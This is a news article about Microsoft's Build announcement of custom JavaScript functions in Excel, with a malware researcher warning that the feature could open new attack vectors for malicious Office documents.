On Monday at its Build conference in Seattle, Microsoft announced a host of software products and updates related to buzzy technologies like machine learning[1] and mixed reality. But the company also debuted a number of smaller upgrades to existing products, including a new Excel feature[2] that allows users to execute custom JavaScript functions in spreadsheets. That might be helpful for spreadsheet junkies, but it makes security researchers cringe.
The move is well-intentioned; it should make Excel even more powerful and capable by allowing users to integrate expanded information from the web and third-party services—think bank account balances or stock prices. But JavaScript also creates more interconnection and more access points[3]—meaning more points of potential vulnerability. It's already a bit of a web security nightmare[4]. And on top of that, attackers have long shown their willingness to exploit customization and automation features in Excel—and other Microsoft Office programs—to create malicious files for phishing and other attacks. The ubiquity of Microsoft Office files make them the perfect vector for tricking victims and wreaking havoc.
Streamlining the tool for legitimate users could make it more effective for attackers.
"JavaScript opens up another attack vector for malicious documents, and is yet another thing that we as defenders will have to watch out for other than what Excel can already do," says Chase Dardaman, a malware analysis researcher based in Texas. "The main concern is that since JavaScript usage in Excel is so new we do not know what controls Microsoft will put around it. They will need to make it more open and easier to use than it currently is, and that could open up new attack vectors."
JavaScript is an extremely popular programming language, and has been around since 1995.